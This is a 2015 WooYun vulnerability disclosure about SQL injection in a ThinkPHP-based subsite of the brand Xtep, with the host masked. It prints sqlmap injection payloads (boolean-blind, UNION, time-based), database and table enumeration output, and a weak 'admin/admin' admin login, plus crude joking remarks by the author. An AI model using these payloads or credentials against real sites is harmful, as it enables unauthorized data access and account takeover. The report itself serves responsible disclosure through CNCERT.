当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134366

漏洞标题: 特步某分站sql注入后台存在弱密码

相关厂商:特步

漏洞作者: phantomer

提交时间:2015-08-18 22:14

修复时间:2015-10-03 11:18

公开时间:2015-10-03 11:18

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-18: 细节已通知厂商并且等待厂商处理中
2015-08-19: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开

简要描述:

特步的一个分站,看分站的名称,应该有一些萝莉吧。

详细说明:

网站:
http://**.**.**.**/
thinkphp框架的。
首先先看sqli吧。
网站里随便一点
http://**.**.**.**/index.php/Product/detail/id/145

Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://**.**.**.**:80/index.php/Product/detail/id/145' AND
8870=8870 AND 'GuDV'='GuDV
    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: http://**.**.**.**:80/index.php/Product/detail/id/-4234' UN
ION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71676c6b71,0x6451456c
7442485a5846,0x71656f7a71),NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://**.**.**.**:80/index.php/Product/detail/id/145' AND
SLEEP(5) AND 'qYUZ'='qYUZ
---
[19:57:51] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0.11


thinkphp框架改出了sqli。

[19:58:59] [INFO] retrieved: information_schema
[19:58:59] [INFO] retrieved: kidxtep_cctv    #竟然还有cctv,什么鬼?
[19:59:00] [INFO] retrieved: qcplay_account
[19:59:00] [INFO] retrieved: seehom
[19:59:01] [INFO] retrieved: t_auschint
[19:59:01] [INFO] retrieved: t_bfham
[19:59:02] [INFO] retrieved: t_school
[19:59:03] [INFO] retrieved: t_zth
[19:59:03] [INFO] retrieved: xfym
[19:59:04] [INFO] retrieved: xtep_run
[19:59:04] [INFO] retrieved: z_acrylic
[19:59:05] [INFO] retrieved: z_ago
[19:59:09] [INFO] retrieved: z_atomdesign
[19:59:21] [INFO] retrieved: z_bona
[19:59:28] [INFO] retrieved: z_cl
[19:59:31] [INFO] retrieved: z_ecard
[19:59:35] [INFO] retrieved: z_fliport
[19:59:35] [INFO] retrieved: z_gt
[19:59:36] [INFO] retrieved: z_hongqiao
[19:59:36] [INFO] retrieved: z_hotel
[19:59:36] [INFO] retrieved: z_huaqing
[19:59:37] [INFO] retrieved: z_huili
[19:59:37] [INFO] retrieved: z_isummerfilm
[19:59:37] [INFO] retrieved: z_jinshu
[19:59:38] [INFO] retrieved: z_kalla
[19:59:38] [INFO] retrieved: z_kama
[19:59:38] [INFO] retrieved: z_kidxtep
[19:59:39] [INFO] retrieved: z_led
[19:59:39] [INFO] retrieved: z_lvqingqi
[19:59:40] [INFO] retrieved: z_magic
[19:59:46] [INFO] retrieved: z_mhs
[19:59:47] [INFO] retrieved: z_music
[19:59:50] [INFO] retrieved: z_musicbox
[19:59:51] [INFO] retrieved: z_nices
[19:59:51] [INFO] retrieved: z_only
[19:59:52] [INFO] retrieved: z_qingci
[19:59:53] [INFO] retrieved: z_shengwu
[20:00:02] [INFO] retrieved: z_tea
[20:00:10] [INFO] retrieved: z_tgk
[20:00:10] [INFO] retrieved: z_topsun
[20:00:11] [INFO] retrieved: z_v012
[20:00:11] [INFO] retrieved: z_xingchun
[20:00:11] [INFO] retrieved: z_xmhxs
[20:00:11] [INFO] retrieved: z_xtep
[20:00:12] [INFO] retrieved: z_xteps
[20:00:12] [INFO] retrieved: z_xtop
[20:00:12] [INFO] retrieved: z_yeaping
[20:00:13] [INFO] retrieved: z_yinxiang
[20:00:13] [INFO] retrieved: z_youfan
[20:00:13] [INFO] retrieved: z_zcomputer
[20:00:13] [INFO] retrieved: z_zestrip
[20:00:14] [INFO] retrieved: z_ztravel
[20:00:14] [INFO] retrieved: z_zzwell


不知道小萝莉在哪个库里。

[20:07:33] [INFO] retrieved: kidxtep_admin#  其实后来都用不到这个。
[20:07:33] [INFO] retrieved: kidxtep_admin_role
[20:07:34] [INFO] retrieved: kidxtep_adsense
[20:07:34] [INFO] retrieved: kidxtep_adsense_category
[20:07:38] [INFO] retrieved: kidxtep_article
[20:07:38] [INFO] retrieved: kidxtep_article_category
[20:07:48] [INFO] retrieved: kidxtep_banner
[20:07:56] [INFO] retrieved: kidxtep_banner_category
[20:07:56] [INFO] retrieved: kidxtep_category
[20:07:57] [INFO] retrieved: kidxtep_config
[20:07:58] [INFO] retrieved: kidxtep_link
[20:07:58] [INFO] retrieved: kidxtep_link_category
[20:07:59] [INFO] retrieved: kidxtep_log
[20:07:59] [INFO] retrieved: kidxtep_log_category
[20:08:00] [INFO] retrieved: kidxtep_module
[20:08:00] [INFO] retrieved: kidxtep_pic
[20:08:01] [INFO] retrieved: kidxtep_show
[20:08:01] [INFO] retrieved: kidxtep_show_category
[20:08:02] [INFO] retrieved: kidxtep_video


后台地址:
http://**.**.**.**/admin.php/Public/login

admin  admin


QQ截图20150815201022.jpg


找了几个上传点,都是上传到无法解析php的目录。没想到好法子跨目录。或者是姿势不够。
最近刚学了点代码审计,想着试试审计一下这个代码,毕竟这个cms写的那么辣鸡。一点很多漏洞,可发现网上找不到源码。
ping ip 发现和黄冈中学在同一个ip上。

QQ截图20150815201622.jpg


QQ截图20150815201702.jpg


看来特步给学霸中学提供小学生鞋子。。。这样真的好么?

QQ截图20150815201834.jpg

漏洞证明:

[19:58:59] [INFO] retrieved: information_schema
[19:58:59] [INFO] retrieved: kidxtep_cctv    #竟然还有cctv,什么鬼?
[19:59:00] [INFO] retrieved: qcplay_account
[19:59:00] [INFO] retrieved: seehom
[19:59:01] [INFO] retrieved: t_auschint
[19:59:01] [INFO] retrieved: t_bfham
[19:59:02] [INFO] retrieved: t_school
[19:59:03] [INFO] retrieved: t_zth
[19:59:03] [INFO] retrieved: xfym
[19:59:04] [INFO] retrieved: xtep_run
[19:59:04] [INFO] retrieved: z_acrylic
[19:59:05] [INFO] retrieved: z_ago
[19:59:09] [INFO] retrieved: z_atomdesign
[19:59:21] [INFO] retrieved: z_bona
[19:59:28] [INFO] retrieved: z_cl
[19:59:31] [INFO] retrieved: z_ecard
[19:59:35] [INFO] retrieved: z_fliport
[19:59:35] [INFO] retrieved: z_gt
[19:59:36] [INFO] retrieved: z_hongqiao
[19:59:36] [INFO] retrieved: z_hotel
[19:59:36] [INFO] retrieved: z_huaqing
[19:59:37] [INFO] retrieved: z_huili
[19:59:37] [INFO] retrieved: z_isummerfilm
[19:59:37] [INFO] retrieved: z_jinshu
[19:59:38] [INFO] retrieved: z_kalla
[19:59:38] [INFO] retrieved: z_kama
[19:59:38] [INFO] retrieved: z_kidxtep
[19:59:39] [INFO] retrieved: z_led
[19:59:39] [INFO] retrieved: z_lvqingqi
[19:59:40] [INFO] retrieved: z_magic
[19:59:46] [INFO] retrieved: z_mhs
[19:59:47] [INFO] retrieved: z_music
[19:59:50] [INFO] retrieved: z_musicbox
[19:59:51] [INFO] retrieved: z_nices
[19:59:51] [INFO] retrieved: z_only
[19:59:52] [INFO] retrieved: z_qingci
[19:59:53] [INFO] retrieved: z_shengwu
[20:00:02] [INFO] retrieved: z_tea
[20:00:10] [INFO] retrieved: z_tgk
[20:00:10] [INFO] retrieved: z_topsun
[20:00:11] [INFO] retrieved: z_v012
[20:00:11] [INFO] retrieved: z_xingchun
[20:00:11] [INFO] retrieved: z_xmhxs
[20:00:11] [INFO] retrieved: z_xtep
[20:00:12] [INFO] retrieved: z_xteps
[20:00:12] [INFO] retrieved: z_xtop
[20:00:12] [INFO] retrieved: z_yeaping
[20:00:13] [INFO] retrieved: z_yinxiang
[20:00:13] [INFO] retrieved: z_youfan
[20:00:13] [INFO] retrieved: z_zcomputer
[20:00:13] [INFO] retrieved: z_zestrip
[20:00:14] [INFO] retrieved: z_ztravel
[20:00:14] [INFO] retrieved: z_zzwell


不知道小萝莉在哪个库里。

[20:07:33] [INFO] retrieved: kidxtep_admin#  其实后来都用不到这个。
[20:07:33] [INFO] retrieved: kidxtep_admin_role
[20:07:34] [INFO] retrieved: kidxtep_adsense
[20:07:34] [INFO] retrieved: kidxtep_adsense_category
[20:07:38] [INFO] retrieved: kidxtep_article
[20:07:38] [INFO] retrieved: kidxtep_article_category
[20:07:48] [INFO] retrieved: kidxtep_banner
[20:07:56] [INFO] retrieved: kidxtep_banner_category
[20:07:56] [INFO] retrieved: kidxtep_category
[20:07:57] [INFO] retrieved: kidxtep_config
[20:07:58] [INFO] retrieved: kidxtep_link
[20:07:58] [INFO] retrieved: kidxtep_link_category
[20:07:59] [INFO] retrieved: kidxtep_log
[20:07:59] [INFO] retrieved: kidxtep_log_category
[20:08:00] [INFO] retrieved: kidxtep_module
[20:08:00] [INFO] retrieved: kidxtep_pic
[20:08:01] [INFO] retrieved: kidxtep_show
[20:08:01] [INFO] retrieved: kidxtep_show_category
[20:08:02] [INFO] retrieved: kidxtep_video


admin  admin


QQ截图20150815201022.jpg


修复方案:

QQ截图20150815202246.jpg


你们都携手智能硬件走进360了,为啥还不重视安全呢?

版权声明:转载请注明来源 phantomer@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-19 11:16

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。

最新状态:

暂无